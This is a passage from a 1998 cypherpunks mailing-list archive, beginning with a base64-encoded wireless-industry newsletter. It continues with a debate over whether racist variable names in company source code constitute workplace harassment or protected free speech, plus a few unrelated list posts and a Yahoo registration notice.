aHR0cDovL3NzMDAzLmluZmkubmV0L3RyaWFkL25yb25saW5lL25ld3Mvd2Fy
ZDI1Lmh0bSI+R1JFRU5TQk9STwpORVdTICZhbXA7IFJFQ09SRDwvQT4pPC9G
T05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8
VEQ+PEJSPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4KCjxUUj4KPFREPjwvVEQ+
Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBT
SVpFPSsxPlBpb25lZXIgdG8gU2VsbCBDYXIgTmF2aWdhdGlvbgpTeXN0ZW0g
aW4gVS5TLiwgRXVyb3BlPC9GT05UPjwvRk9OVD48L0I+PC9URD4KCjxURD48
L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNFPSJB
cmlhbCxIZWx2ZXRpY2EiPlRoZSBzeXN0ZW0gLS0gYXZhaWxhYmxlIGluIEVu
Z2xpc2gsIEdlcm1hbgphbmQgRnJlbmNoIHZlcnNpb25zIC0tIHdpbGwgYmUg
bWFya2V0ZWQgbWFpbmx5IGluIHRoZSBVLlMuIHN0YXRlcyBvZiBDYWxpZm9y
bmlhLApGbG9yaWRhIGFuZCBXYXNoaW5ndG9uIGFzIHdlbGwgYXMgaW4gR2Vy
bWFueSBhbmQgRnJhbmNlLiAoPEEgSFJFRj0iaHR0cDovL3d3dy5uaWtrZWku
Y28uanAvZW5ld3MvVE5LUy9wYWdlL0hpZ2gtVGVjaC5odG1sI2dlbjE0MyI+
TklLS0VJCk5FVDwvQT4pPC9GT05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9UUj4K
CjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEJSPjwvVEQ+Cgo8VEQ+PC9URD4KPC9U
Uj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJpYWws
SGVsdmV0aWNhIj48Rk9OVCBTSVpFPSsxPkdlcm1hbnkgdG8gTGF1bmNoIFdp
cmVsZXNzCkxvY2FsIExvb3AgUGhvbmUgTmV0d29ya3M8L0ZPTlQ+PC9GT05U
PjwvQj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoK
PFREPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+VGhlIEdlcm1hbiBn
b3Zlcm5tZW50J3MgdGVsZWNvbW11bmljYXRpb25zCmFnZW5jeSBwbGFucyB0
byBpc3N1ZSBsaWNlbnNlcyBmb3IgYSBuZXcgZ2VuZXJhdGlvbiBvZiB3aXJl
bGVzcyB0ZWNobm9sb2d5CmZvciBsb2NhbCBwaG9uZSBzZXJ2aWNlcyBhaW1l
ZCBhdCBpbmNyZWFzaW5nIGNvbXBldGl0aW9uIHdpdGggRGV1dHNjaGUKVGVs
ZWtvbS4gVGhlIGZpcnN0IGxpY2Vuc2VzIHdvdWxkIGJlIGF3YXJkZWQgaW4g
T2N0b2JlciBmb3IgcG9pbnQtdG8tbXVsdGlwb2ludAooUE1QKSBzZXJ2aWNl
cyBpbiBvbmUgb2YgdGhlIGJyb2FkZXN0IHJvbGxvdXRzIG9mIHRoZSBuZXcg
dGVjaG5vbG9neSB3b3JsZHdpZGUuCig8QSBIUkVGPSJodHRwOi8vd3d3Lm5l
d3MuY29tL05ld3MvSXRlbS9UZXh0b25seS8wLDI1LDI1NjU4LDAwLmh0bWw/
cGZ2Ij5ORVdTLkNPTTwvQT4pPC9GT05UPjwvVEQ+Cgo8VEQ+PC9URD4KPC9U
Uj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEJSPjwvVEQ+Cgo8VEQ+PC9URD4K
PC9UUj4KCjxUUj4KPFREPjwvVEQ+Cgo8VEQ+PEI+PEZPTlQgRkFDRT0iQXJp
YWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPSsxPkNhbmFkYSdzIE5ld2JyaWRn
ZSBNZWV0cwpQcm9maXQgRXN0aW1hdGVzLCBBZGRzIERlYWw8L0ZPTlQ+PC9G
T05UPjwvQj48L1REPgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1RE
PgoKPFREPjxGT05UIEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+Q29tcHV0ZXIg
bmV0d29ya2luZyBmaXJtIE5ld2JyaWRnZSBOZXR3b3JrcwpDb3JwLiBwb3N0
ZWQgZWFybmluZ3Mgb24gVHVlc2RheSB0aGF0IGVxdWFsZWQgc3RyZWV0IHBy
ZWRpY3Rpb25zIGFuZCB1bnZlaWxlZAphIFVTJDMwMCBtaWxsaW9uLCAzLXll
YXIgZGVhbCB3aXRoIFNCQyBDb21tdW5pY2F0aW9ucyBJbmMuICg8QSBIUkVG
PSJodHRwOi8vYml6LnlhaG9vLmNvbS9maW5hbmNlLzk4MDgyNS9jYW5hZGFf
bmV3XzEuaHRtbCI+WUFIT088L0E+KTwvRk9OVD48L1REPgoKPFREPjwvVEQ+
CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCUj48L1REPgoKPFREPjwv
VEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxCPjxGT05UIEZBQ0U9
IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0rMT5Ob2tpYSB0byBTdXBw
bHkgR1NNIE5ldHdvcmsKRXhwYW5zaW9uIGluIEJlaWppbmcsIENoaW5hPC9G
T05UPjwvRk9OVD48L0I+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8
VEQ+PC9URD4KCjxURD48Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPk5v
a2lhIHdpbGwgZGVsaXZlciBHU00gOTAwIGFuZCBHU00gMTgwMAplcXVpcG1l
bnQgaW5jbHVkaW5nIGl0cyBtb2JpbGUgc3dpdGNoaW5nIGNlbnRlcnMgKE1T
QyksIGhvbWUgbG9jYXRpb24gcmVnaXN0ZXJzCihITFIpLCBiYXNlIHN0YXRp
b24gY29udHJvbGxlcnMgKEJTQykgYW5kIGJhc2Ugc3RhdGlvbnMuIFRoZSB2
YWx1ZSBvZiB0aGUKY29udHJhY3QgaXMgVVMkNTYgbWlsbGlvbi4gRGVsaXZl
cmllcyB3aWxsIGJlZ2luIGluIFNlcHRlbWJlciBhbmQgdGhlIG5ldHdvcmsK
YWRkaXRpb25zIGFyZSBleHBlY3RlZCB0byBiZSBvcGVyYXRpb25hbCBhdCB0
aGUgZW5kIG9mIHRoaXMgeWVhci4gKDxBIEhSRUY9Imh0dHA6Ly9iaXoueWFo
b28uY29tL2J3Lzk4MDgyNi9ub2tpYV8xLmh0bWwiPllBSE9PPC9BPikmbmJz
cDs8L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9U
RD4KCjxURD4KPEhSIFdJRFRIPSIxMDAlIj48L1REPgoKPFREPjwvVEQ+Cjwv
VFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05UIEZBQ0U9IkFyaWFsLEhl
bHZldGljYSI+PEZPTlQgU0laRT0tMT5Gb3IgYWRkaXRpb25hbCBuZXdzIGFi
b3V0CnRoZSB3aXJlbGVzcyBpbmR1c3RyeS0taW5jbHVkaW5nIHBlcmlvZGlj
IG5ld3MgdXBkYXRlcyB0aHJvdWdob3V0IHRoZSBkYXktLXZpc2l0CjxBIEhS
RUY9Imh0dHA6Ly93d3cud293LWNvbS5jb20iPmh0dHA6Ly93d3cud293LWNv
bS5jb20uPC9BPjwvRk9OVD48L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RS
PgoKPFRSPgo8VEQ+PC9URD4KCjxURD4KPEhSIFdJRFRIPSIxMDAlIj48L1RE
PgoKPFREPjwvVEQ+CjwvVFI+Cgo8VFI+CjxURD48L1REPgoKPFREPjxGT05U
IEZBQ0U9IkFyaWFsLEhlbHZldGljYSI+PEZPTlQgU0laRT0tMT5DVElBIERh
aWx5IE5ld3MgZnJvbSBXT1ctQ09NCmlzIHRyYW5zbWl0dGVkIHdlZWtkYXlz
LCBleGNlcHQgZm9yIGhvbGlkYXlzLiBWaXNpdCB1cyBvbiB0aGUgV29ybGQg
V2lkZQpXZWIgYXQgPEEgSFJFRj0iaHR0cDovL3d3dy53b3ctY29tLmNvbS9w
cm9mZXNzaW9uYWwiPmh0dHA6Ly93d3cud293LWNvbS5jb20vcHJvZmVzc2lv
bmFsPC9BPi4mbmJzcDs8L0ZPTlQ+PC9GT05UPiZuYnNwOwoKPFA+PEZPTlQg
RkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPS0xPklmIHlvdSBh
cmUgbm90IGludGVyZXN0ZWQKaW4gcmVjZWl2aW5nIHRoZSBDVElBIERhaWx5
IE5ld3MgZnJvbSBXT1ctQ09NLCBwbGVhc2Ugc2VuZCBhIG1lc3NhZ2UgdG8K
PEEgSFJFRj0ibWFpbHRvOnVuam9pbi1DVElBX0RhaWx5X05ld3NAdW0yLnVu
aXR5bWFpbC5jb20iPnVuam9pbi1DVElBX0RhaWx5X05ld3NAdW0yLnVuaXR5
bWFpbC5jb208L0E+LiZuYnNwOzwvRk9OVD48L0ZPTlQ+Jm5ic3A7Cgo8UD48
Qj4qKio8Rk9OVCBGQUNFPSJBcmlhbCxIZWx2ZXRpY2EiPjxGT05UIFNJWkU9
LTE+IFRoZSB0ZXJtICJ1bmpvaW4tQ1RJQV9EYWlseV9OZXdzQHVtMi51bml0
eW1haWwuY29tIgptdXN0IGJlIGxpc3RlZCBpbiB0aGUgVE8gc2VjdGlvbiBv
ZiB0aGUgZW1haWwuPC9GT05UPjwvRk9OVD4gKioqPC9CPiZuYnNwOwoKPFA+
PEZPTlQgRkFDRT0iQXJpYWwsSGVsdmV0aWNhIj48Rk9OVCBTSVpFPS0xPlBs
ZWFzZSBOb3RlOiBTb21lIG9mIHRoZQpsaW5rcyBpbiB0b2RheSdzIG5ld3Mg
YXJlIHRpbWUgc2Vuc2l0aXZlLiZuYnNwOyBUaG9zZSBsaW5rcyBtYXkgbm90
IGJlCmF2YWlsYWJsZSBhcyBuZXdzIGNoYW5nZXMgdGhyb3VnaG91dCB0aGUg
ZGF5LiZuYnNwOyBBbHNvLCBzb21lIG5ld3Mgc291cmNlcwptYXkgYmUgc3Vi
c2NyaXB0aW9uLWJhc2VkIG9yIHJlcXVpcmUgcmVnaXN0cmF0aW9uLjwvRk9O
VD48L0ZPTlQ+PC9URD4KCjxURD48L1REPgo8L1RSPgoKPFRSPgo8VEQ+PC9U
RD4KCjxURD4KPEhSIFdJRFRIPSIxMDAlIj48L1REPgoKPFREPjwvVEQ+Cjwv
VFI+CjwvVEFCTEU+CiZuYnNwOzwvY2VudGVyPgo8L0JPRFk+CjwvSFRNTD4K
--Boundary..3995.1071713796.multipart/mixed--



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@openpgp.net>
Date: Wed, 26 Aug 1998 12:12:19 -0700 (PDT)
To: Xcott Craver <caj@math.niu.edu>
Subject: Re: Is Hate Code Speech?
In-Reply-To: <Pine.SUN.3.91.980826132122.4771A-100000@baker>
Message-ID: <199808261919.OAA016.99@geiger.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In <Pine.SUN.3.91.980826132122.4771A-100000@baker>, on 08/26/98 
   at 01:40 PM, Xcott Craver <caj@math.niu.edu> said:


>On Wed, 26 Aug 1998, William H. Geiger III wrote:

>> Yes but should this "standard" be enforced by law? Last time I looked
>> there was no Constitutional right not to be offended.

>	Yet harassment is actionable.  Nutty, huh?  And it's just
>	the tip of the iceberg:  apparently the law protects you
>	from being severely beaten, despite the fact that there is
>	no explicit constitutional right not to be severely beaten.

>	Not trying to equate harassment with a severe beating, just
>	pointing out that the lack of an explicit constitutional 
>	right does not magically nullify the rest of the law.

No, it does not, but unlike beating I *do* have a Constitutional right to
be objectionable as I want with my speech. A good example is the Nazi
march in Skokie,IL. The SC ruled that they had a right to march despite
the fact that the large Jewish community there was quite offended by it.

>> strong Constitutional right to freedom of speech and the courts have long
>> ruled that it is not just popular speech that is protected.

>	Indeed, "popular" speech is, almost by definition, the kind
>	of speech that never really needs protection.  That first amendment
>	wouldn't have much of a purpose if it only protected popular
>	stuff.
>	

>> IMHO, this whole matter is an internal company matter. The courts and
>> politicians should have no say in it.

>	It WAS an internal company matter, apparently, but the 
>	company didn't seem to do anything to remedy it.  That's 
>	when you turn to law.  

I see, so if a company and it's employees exercise their Constitutionally
protect right of free speech and does not stop exercising that right when
someone complains then the courts should take over? How does this match
with your agreement that the 1st Amendment protects unpopular speech?

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: DOS=HIGH? I knew it was on something...

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNeRfzI9Co1n+aLhhAQESSQP+JLyUGOJImWZ8OU9fp2/HpLS89NGmznFN
tTdy/fVBOJxZzj+WVaNgy1fIYpgv/4VvLl+PWGDfH3ZpItTn+bj368vAQnv+UcVc
ywHHDtLANyAHQqqioz733Zz7D5/KoZ98pei6lGsHzB4kie+3uqaCT4XoSx/LnUpg
z8N0s4gKtXE=
=JuvM
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Francis, Catherine" <cfrancis@securitydynamics.com>
Date: Wed, 26 Aug 1998 11:24:08 -0700 (PDT)
To: "'lacc@suburbia.net>
Subject: RE: LACC: Re: Is hate code speech?
Message-ID: <6B5344C210C7D011835C0000F8012766020BB4B0@exna01.securitydynamics.com>
MIME-Version: 1.0
Content-Type: text/plain


I worry that, in the process of laying all this flame-bait, y'all are hoping
that naive people might think that a job where there's racial and sexual
hate-speech isn't a hostile work environment.  Putting this sort of language
in code does not shelter it from co-workers.

	It doesn't matter that the offensive names weren't directed at her.
It's much worse that they were directed towards an entire group.  Or maybe
you just admire ethnic slander in terms of cost-efficiency, a sort of
more-bang-for-the-buck maximization of intolerance where it's a question of
offending the greatest number with the least amount of effort, and simply
admire the mechanism by which it's been accomplished?

	This isn't an issue of free speech.  Well, maybe.  The coder is free
to name her/his/its variables what they like, all ethical issues aside, and
equally free to live with the consequences of those actions, which should
have been the company not using something so vastly unprofessional and
guaranteed to eventually open them up to a suit like this.  There are
standards of behavior in a workplace that are slightly more restrictive than
standing on a soapbox on the quad.  A software company's code is an internal
company document.  The code that you write at home is your document.  You
may find this distinction instructive.

I'm sorry to digress, since this isn't why the article was originally
posted, but I was forced to succumb to the troll.  Free speech is essential
in an open society.   Freedom from discrimination is essential in a
democracy.   Carry on.


> ----------
> From: 	William H. Geiger III[SMTP:whgiii@openpgp.net]
> Reply To: 	lacc@suburbia.net
> Sent: 	Tuesday, August 25, 1998 6:24 PM
> To: 	lacc@suburbia.net
> Cc: 	proff@suburbia.net; aucrypto@suburbia.net; cypherpunks@toad.com
> Subject: 	LACC: Re: Is hate code speech?
> 
> 
> 
> -----BEGIN PGP SIGNED MESSAGE-----
> 
> In <Pine.SUN.3.91.980825155854.3483A-100000@baker>, on 08/25/98 
>    at 04:19 PM, Xcott Craver <caj@math.niu.edu> said:
> 
> >On Tue, 25 Aug 1998, William H. Geiger III wrote:
> 
> >> <sigh> Now we have to worry about PC variable and function names. What
> a
> >> crock. 
> 
> >	Oh, yeah, you really have to worry about *accidentally*
> >	calling your variables getwatermelons and somefriedchicken.
> >	Reminds me of this one guy in our neighborhood who was just
> >	jogging by our house, bent down to tie a shoelace, lost 
> >	his balance and accidentally planted a huge burning cross
> >	in our front lawn.  Woops!  Those damn PC-mongers are 
> >	making it a crime to jog!
> 
> Yes and if I want to name my variables getwatermelons and somefiredchicken
> who are you to tell me I can't?
> 
> >	One note:  I don't see why this lawsuit would be hard to win
> >	on the grounds that source code isn't necessarily "speech."
> >	If co-workers left a big wooden swastika on her desk it 
> >	wouldn't be speech either, but I'd call that actionable.	
> 
> But they didn't. There is no proof that any of theses variable names were
> written to be directed at her and the majority of them were written
> *before* she ever started working there!!
> 
> - -- 
> - ---------------------------------------------------------------
> William H. Geiger III  http://www.openpgp.net
> Geiger Consulting    Cooking With Warp 4.0
> 
> Author of E-Secure - PGP Front End for MR/2 Ice
> PGP & MR/2 the only way for secure e-mail.
> OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
> - ---------------------------------------------------------------
>  
> Tag-O-Matic: OS/2: Not just another pretty program loader!
> 
> -----BEGIN PGP SIGNATURE-----
> Version: 2.6.3a-sha1
> Charset: cp850
> Comment: Registered_User_E-Secure_v1.1b1_ES000000
> 
> iQCVAwUBNeM6Qo9Co1n+aLhhAQEHMAP+OdR38utDHJd4s8r3/fTVedI+xH9A+lNX
> CU/yeqOx2Y9P8K/ol1wdLf4U3Dzv3VZ+CvRUmVB4juRdFBTnor7wrS3CQiQ1krut
> K3nLi7HtUqb92VD55eCM4W61c67lqLTD7TTXW2p6sHm8ti3NgK1fGfRPTSk5Ay9S
> j2tEl6HI5P8=
> =jRNy
> -----END PGP SIGNATURE-----
> 




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@openpgp.net>
Date: Wed, 26 Aug 1998 12:33:01 -0700 (PDT)
To: Dan Stromberg <strombrg@nis.acs.uci.edu>
Subject: Re: LACC: Re: Is hate code speech?
In-Reply-To: <35E45A31.1CD2@nis.acs.uci.edu>
Message-ID: <199808261937.OAA017.62@geiger.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In <35E45A31.1CD2@nis.acs.uci.edu>, on 08/26/98 
   at 11:55 AM, Dan Stromberg <strombrg@nis.acs.uci.edu> said:

>> Also please explain exactly what "violent stuff" you are in reference to
>> and how it is "clear cut".

>Violence is obviously out of line.  Or do you like being threatened?

No where in the article was it ever mentioned that the you lady in
question was ever threatened or ever directly "harassed". That is why I
asked the above question which you failed to answer.

>> >Creating a hostile environment with the expectation that you'll never
>> >hire someone who's black is "ok"?
>> 
>> 1st off the whole notion of "hostile environment" is bunk. It is a loosely
>> undefined term to mean anything the PC crowd wants it to. If you do or say

>I can see you're not worth bothering with.
>Sad that I wasted this much time responding.

Why, because I challenge your PC dogma and require to to rationally
justify it? We have an old saying here "If you are scared son, then say
you are scared". If you are unable to rationally and objectively justify
your PC dogma than just say so.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://www.openpgp.net
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://www.openpgp.net/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: Turn your 486 into a Gameboy: Type WIN at C:\>

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNeRkB49Co1n+aLhhAQH0+gQAwuGSiy0ZSP0don4VS5UBKoARjg9LLx26
D8N6xP4286uHW4Phm9A+nHBYohV1bWPTLOM259G0gcy1xIUebNnLg7W4iV+2ITHH
lm6yoPLvtN8Oa1QW5hAZAVTC2zIZ+iglD49WhblTMjMd69KR7nU3CWD36rXb4Vsu
oc2RxcrCPJ8=
=k0l2
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Wed, 26 Aug 1998 11:44:59 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re:
In-Reply-To: <199808261740.TAA08755@replay.com>
Message-ID: <35E45684.BA1CC753@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


Anonymous wrote:
> 
> http://www.itd.nrl.navy.mil/ITD/5540/ieee/cipher/news-items/980713.LISTWATCH
> .html
> 
> My online review of this list and others.
> 
> Mary Ellen Zurko
> "We will be obliged to take action ourselves" -Gore on privacy


Sorry Anon, but that url 404's... Perhaps you could try again?

-- 

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder@sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Ray Arachelian <sunder@brainlink.com>
Date: Wed, 26 Aug 1998 12:22:29 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re:
In-Reply-To: <199808261740.TAA08755@replay.com>
Message-ID: <35E45F4D.B9E37A67@brainlink.com>
MIME-Version: 1.0
Content-Type: text/plain


Erm, sorry, replied to that a bit too quick. :(  Should have seen the 2nd line.
:( 

My bad.

Ray Arachelian wrote:
> 
> Anonymous wrote:
> >
> > http://www.itd.nrl.navy.mil/ITD/5540/ieee/cipher/news-items/980713.LISTWATCH
> > .html
> >
> > My online review of this list and others.
> >
> > Mary Ellen Zurko
> > "We will be obliged to take action ourselves" -Gore on privacy
> 
> Sorry Anon, but that url 404's... Perhaps you could try again?
> 
> --
> 
> =====================================Kaos=Keraunos=Kybernetos==============
> .+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
> ..\|/..|sunder@sundernet.com|you once again. I thought you were      |/\|/\
> <--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
> ../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
> .+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
> ======================= http://www.sundernet.com ==========================

-- 

=====================================Kaos=Keraunos=Kybernetos==============
.+.^.+.|  Ray Arachelian    |Prying open my 3rd eye.  So good to see |./|\.
..\|/..|sunder@sundernet.com|you once again. I thought you were      |/\|/\
<--*-->| ------------------ |hiding, and you thought that I had run  |\/|\/
../|\..| "A toast to Odin,  |away chasing the tail of dogma. I opened|.\|/.
.+.v.+.|God of screwdrivers"|my eye and there we were....            |.....
======================= http://www.sundernet.com ==========================




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Xcott Craver <caj@math.niu.edu>
Date: Wed, 26 Aug 1998 13:59:18 -0700 (PDT)
To: "William H. Geiger III" <whgiii@openpgp.net>
Subject: Re: Is Hate Code Speech?
In-Reply-To: <199808261919.OAA016.99@geiger.com>
Message-ID: <Pine.SUN.3.91.980826151513.4910A-100000@baker>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 26 Aug 1998, William H. Geiger III wrote:

> >	Not trying to equate harassment with a severe beating, just
> >	pointing out that the lack of an explicit constitutional 
> >	right does not magically nullify the rest of the law.
> 
> No, it does not, but unlike beating I *do* have a Constitutional right to
> be objectionable as I want with my speech.

	Right.  And other people have a legal recourse against
	you if your free speech does something tangibly damaging.
	Inciting a riot, for instance, or commiting slander, or
	committing mail fraud.  

	Now, something not tangibly damaging, like harassment,
	is not so clear cut.  But that's why a judge or jury of 
	your peers has to agree before you're forced to pay damages.

> A good example is the Nazi march in Skokie,IL.  The SC ruled that they 
> had a right to march despite
> the fact that the large Jewish community there was quite offended by it.

	Yes.  And those same courts would consider it harassment if
	a manager in a company, which has nothing to do with Hitler or 
	Nazis, started cc-mailing anti-Jewish diatribe where Jewish
	employees would see it.  

> I see, so if a company and it's employees exercise their Constitutionally
> protect right of free speech and does not stop exercising that right when
> someone complains then the courts should take over?

	You seem to be painting this as the government "stepping in,"
	rather than one of the parties involved going TO the gov't
	(i.e., taking it to the courts) for help.  The answer to your 
	question is YES:  the whole reason civil law exists is so 
	you can resolve disputes that can't get resolved otherwise.

> How does this match
> with your agreement that the 1st Amendment protects unpopular speech?

	The same way libel laws coexist with the 1st Amendment.
	It's a gross oversimplification to believe that the 1st 
	amendment absolves you of all legal consequences of the things
	you say.  Do you consider libel law unconstitutional? 
	how about copyright law?  Do you think it's wrong that you
	can get in trouble for sending people death threats?
	Obscene phone calls?  Publishing _Jurassic Park_ in your
	name?  Telling people that you can cure their cancer for 
	$100 cash?

	Hey, it's all speech.

	Maybe in an alternate universe where the constitution is 
	scribbled in crayon on 1-inch ruled paper, you can say
	anything you want and neener-neener to anyone who gets
	hurt.  But here in objective reality it's much more 
	complex.
							-Caj




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Jim Tatz <jtatz@chemistry.ohio-state.edu>
Date: Wed, 26 Aug 1998 14:44:19 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: Is Hate Code Speech?
Message-ID: <Pine.GSO.3.93.980826174247.27070A-100000@chemistry.mps.ohio-state.edu>
MIME-Version: 1.0
Content-Type: text/plain


Revolutionary idea! 

*If you don't like what the SOURCE CODE says.. WORK for another company!*


-Jim
-----------------------------------------------------------------------
"Don't take yourself too seriously." -Gary Allen Smith





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: games-register@yahoo-inc.com
Date: Wed, 26 Aug 1998 18:55:43 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Registration confirmation - Yahoo! Games
Message-ID: <199808270155.SAA11172@e6.my.yahoo.com>
MIME-Version: 1.0
Content-Type: text/plain


Welcome to Yahoo!
Please save this message for future reference.

This confirmation message is sent to all users when 
they create a new account with Yahoo. During registration
we require users to enter their email address.
This confirmation notice is then sent to that address.


If you DID NOT request this account, we encourage you to REMOVE 
it by doing the following:

If your email software supports it, you can simply click on 
the link below. Since this web address (URL) is quite long 
you may find it necessary to copy the entire URL and paste 
it into your Web browser.

http://edit.my.yahoo.com/config/remove_user?k=IXtKZI53f2J1d3l8OI4heUphdX03e3Y1ZXgxNU55IXVKTjczNk81TjY3IXNKYGY%3d

If you are prompted for the deletion key when using the
URL above, please use the following deletion key:
IXtKZI53f2J1d3l8OI4heUphdX03e3Y1ZXgxNU55IXVKTjczNk81TjY3IXNKYGY=

Or, if you do not have internet access, please reply 
to this email (and make sure to copy this entire email 
in your reply) with REMOVE as the subject line.

___________

Your Yahoo ID is: cypherpnk

You can return to Yahoo! Games by going to
                http://play.yahoo.com/

Your Yahoo! ID may be used to access any of the Yahoo! services
that request a Yahoo! ID, such as:

My Yahoo - http://my.yahoo.com
Yahoo Calendar - http://calendar.yahoo.com
Yahoo Chat - http://chat.yahoo.com
Yahoo Classifieds - http://classifieds.yahoo.com
Yahoo Clubs - http://clubs.yahoo.com
Yahoo Finance - http://quote.yahoo.com
Yahoo Games - http://play.yahoo.com
Yahoo Mail - http://mail.yahoo.com
Yahoo Message Boards - http://messages.yahoo.com
Yahoo Pager - http://pager.yahoo.com
Yahoo Travel - http://travel.yahoo.com


Your e-mail is: cypherpunks@toad.com

We will use this address is case you ever forget your 
Yahoo ID or password. We'll need an address to automatically 
send a response to you.  To change this address, go to 
http://my.yahoo.com and click on the Account Information
link at the top of the page.  The edit page will let you 
update your E-Mail address, and other personal information 
and preferences.

________

Yahoo! Accounts - Top Frequently Asked Questions (FAQ)

Q. How much is all this going to cost me?

A. Absolutely nothing. All Yahoo! information is paid for 
through advertising. 

Q. What if I forget my Yahoo! ID or password

A. Just click on the Help is Here link at the bottom of the 
login page. We'll ask you some basic questions to confirm 
your identity, then send you the information to the email 
address listed in your account.

Q.  How do I change my password or Yahoo! ID?

If you would like to change your Yahoo Password in My Yahoo!, 
just click Acct Info at the top of the page.  Unfortunately, 
we do not have the ability to change your Yahoo! ID. You will 
have to create a new account if you wish to have a new Yahoo! ID. 
Please note that if you do re-register, you will need to re-set 
all of your preferences for your My Yahoo! and other Yahoo!
personalized services.

Q. What is an Alias?

A.  Under your Yahoo! ID, you may add additional names for 
use in our various services, such as Chat and Classifieds.

Q. How is the Yahoo! ID stored?

A. Your Yahoo! ID is stored as a cookie on your computer.  
This way, you only need to login once. If you upgrade your 
computer software, change computers, delete your internet 
files, or click Sign Out at any time, it will clear the 
cookie from the computer's hard drive.  Just return to the
login page and enter your Yahoo! ID and Yahoo Password in 
the spaces provided and click Sign In to restore the information.  
You do not need to register again. 

Q. I use a public terminal, how do I sign out?

A. If you are using a public computer, you should always 
sign out to clear your Yahoo! ID and cookie from the computer's 
hard drive. Just click the Sign Out button or link near the top 
of the main page.

Thank you for using Yahoo!

[207.4.89.156]







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Xcott Craver <caj@math.niu.edu>
Date: Wed, 26 Aug 1998 17:14:47 -0700 (PDT)
To: Jim Tatz <jtatz@chemistry.ohio-state.edu>
Subject: Re: Is Hate Code Speech?
In-Reply-To: <Pine.GSO.3.93.980826174247.27070A-100000@chemistry.mps.ohio-state.edu>
Message-ID: <Pine.SUN.3.91.980826190811.5201A-100000@baker>
MIME-Version: 1.0
Content-Type: text/plain


On Wed, 26 Aug 1998, Jim Tatz wrote:

> Revolutionary idea! 
> 
> *If you don't like what the SOURCE CODE says.. WORK for another company!*

	Ditto if you don't like the pay, or the way the boss keeps
	feeling you up, or that one catwalk over the chemical vats
	with the loose rivets that you have to stand on.

	I'm sure if it was as easy as just walking out of one job into
	a better one there would be no minimum wage, "harassment" in
	the workplace, labor unions or huge fines for companies who
